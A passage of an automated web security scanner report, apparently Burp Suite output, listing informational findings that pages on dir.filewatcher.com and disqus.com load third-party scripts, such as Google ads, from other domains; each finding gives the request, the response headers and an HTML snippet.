<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.115. http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WggwIsm1hyihQhmXNRbroQ"
Content-Length: 22445
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.116. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/powerpc.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/powerpc.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WPAiz9MiTz1OHfi6Pk4uFQ"
Content-Length: 13155
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 168
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.2/powerpc/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.117. http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qnqcNGV6GTGvBfWiVN/i8A"
Content-Length: 22667
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 162
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.118. http://dir.filewatcher.com/d/OpenBSD/4.3.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.3.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "SSR7GaETSRUhQQUTgsEDUA"
Content-Length: 5621
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.3/</title>
</head>
<b
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.119. http://dir.filewatcher.com/d/OpenBSD/4.3/i386.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.3/i386.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3/i386.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QI5A3VO7vGnuIL9Fr+tYmA"
Content-Length: 12985
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 174
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/4.3/i386/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.120. http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:42 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tT6tidPH7IfBUdKWEEVcmQ"
Content-Length: 22893
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:42 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 173
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.121. http://dir.filewatcher.com/d/OpenBSD/snapshots.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/snapshots.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "La3DrOMkkLlYGCkVDEFg3Q"
Content-Length: 5606
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/snapshots/</title>
</he
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.122. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/snapshots/alpha.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots/alpha.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:59 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "iMI3o/X81m+HnFcyfNu1kA"
Content-Length: 13693
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 171
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/OpenBSD/snapshots/alpha/</title
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.123. http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:02:57 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "RoWFpfcPc20SwbRr6yBiNw"
Content-Length: 23042
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:02:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 172
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub</title>
</head>
<body class=
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.124. http://dir.filewatcher.com/d/Other.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:04:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VG22mCije93HtWk3YQLD4A"
Content-Length: 9382
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:04:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 210
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/</title>
</head>
<body cl
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.125. http://dir.filewatcher.com/d/Other/noarch.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/noarch.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:54 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/8JaTG88mhHgyz3xG5jrGA"
Content-Length: 10078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 230
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/</title>
</head>
<
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.126. http://dir.filewatcher.com/d/Other/noarch/Applications.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/noarch/Applications.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:53 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "avK3Q2hc+r8EJDuK5JiAgw"
Content-Length: 9768
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 228
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/Applications/</tit
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.127. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/noarch/Applications/Communications.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications/Communications.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:52 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "fCri92R/q7ziXhrxy0LXHw"
Content-Length: 8510
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 229
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/noarch/Applications/Commu
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.128. http://dir.filewatcher.com/d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8G0RehSDBbl/jl9+yR5jLQ"
Content-Length: 21484
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 234
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - A binary file reassembler.
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.129. http://dir.filewatcher.com/d/Other/src.0.0.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/d/Other/src.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/Other/src.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:04:22 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "jgdk3Ry7OLtHUXgrNhHGxA"
Content-Length: 10101
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:04:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 211
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/Other/src/</title>
</head>
<bod
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.130. http://dir.filewatcher.com/packages-directory.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dir.filewatcher.com
Path:	/packages-directory.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /packages-directory.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:53:33 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:53:33 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4464
Content-Length: 25868
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>FileWatcher Software Directory</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

21.131. http://disqus.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disqus.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:31 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17203

<!DOCTYPE html>
<html>
<head>
